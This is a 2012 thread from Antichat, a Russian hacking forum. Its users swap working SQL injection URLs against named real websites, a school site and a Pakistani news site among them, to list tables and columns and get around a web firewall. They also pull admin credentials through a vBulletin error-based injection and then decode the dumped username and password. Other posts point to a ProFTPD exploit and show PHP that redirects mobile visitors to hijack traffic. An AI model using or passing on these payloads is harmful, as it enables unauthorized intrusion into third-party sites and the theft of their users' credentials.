ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.02.2012, 17:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 2110
Репутация:
0
|
|
Как узнать в ProFTPD, включен или выключен mod_sql?
Я слышал, что это exploit http://www.exploit-db.com/exploits/15449/ не работает при включении mod_sql или наоборот.
|
|
|
|

10.02.2012, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от ivan151
ivan151 said:
не поможите таблицу с данными админа найти,просто на сайте как таковых пользователей нет т.к там нет ничего(ни форума ни каких-то отзывов ну и ничего,для чего собственно и регестрируются люди) но на главной странице есть форма входа при нажатии "вход" с пустыми полями ведёт на /admin/index.php судя по всему админка,ну значит и таблица с данными должна быть вот сайт http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,table_NAME,3,4,5+FROM+INFORMATION _SCHEMA.tables+limit+0,1
Moodle ^_^
Код:
Code:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),3,4,5
|
|
|
|

10.02.2012, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Ereee
Ereee said:
Код:
Code:
AddType application/x-httpd-php .css .shtml
Подозрительно ^.
PHP/Javascript-редирект сделать легко.
Пример PHP:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$version[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"desktop"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"])||[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"])))
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: http://TRAFF'[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
Javascript :
Я удалил строчку с .htaccess
AddType application/x-httpd-php .css .shtml
Все равно трафф не идет
|
|
|
|

10.02.2012, 17:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Moriarty
Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...
как проверить id суббака?
|
|
|
|

10.02.2012, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 35174
Репутация:
-6
|
|
Код:
Code:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--
Does not work, WAF?
|
|
|
|

10.02.2012, 23:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 290351
Репутация:
173
|
|
Многие наверно видели уязвимость булки отсюда
Сообщение от None
/showpost.php?p=2833234&postcount=127
Вопрос:
Как откорректировать запрос, если ответ от БД &
Сообщение от None
does_forum.user
Я делал запрос вида
Сообщение от None
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
|
|
|
|

11.02.2012, 00:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 11684
Репутация:
0
|
|
Сообщение от None
вот отлично вот вывел инфу Adminusti,obz:zbo и что тут что? admin-логин а остальное пароль или pusti-логин а остальное пароль?
Смотря какие поля ты выводил
|
|
|
|

11.02.2012, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--
Does not work, WAF?
waf!!
that's work )))
http://www.awt.com.pk/news_detail.php?news_id=-5+union+/*!select*/+1,2,3,4,/*!table_name*/+from+information_schema./*!tables*/+where+table_schema=0x617774636F6D5F617774+limit+0 ,10--
|
|
|
|

11.02.2012, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 23576
Репутация:
-1
|
|
Сообщение от ivan151
ivan151 said:
вывел с разных полей получилось логин Admin пасс pusti а что тогда obz:zbo? и с такими данными пишет ошибку авторизации,странно вообще как то
если ты все верно написал то должно быть так-
Adminusti,obz - login
zbo - password
p.s.
разделитель у тебя 0x3a= :
|
|
|
|

11.02.2012, 16:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от pirat0
pirat0 said:
если ты все верно написал то должно быть так-
Adminusti,obz - login
zbo - password
p.s.
разделитель у тебя 0x3a= :
Херню посоветовал. Там же group_concat а не просто concat или concat_ws используется. Поэтому вывелось 2 акка, разделитель :. Выходит так:
логин - Admin
пароль - pusti
со 2 (тот что через запятую) точно также.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|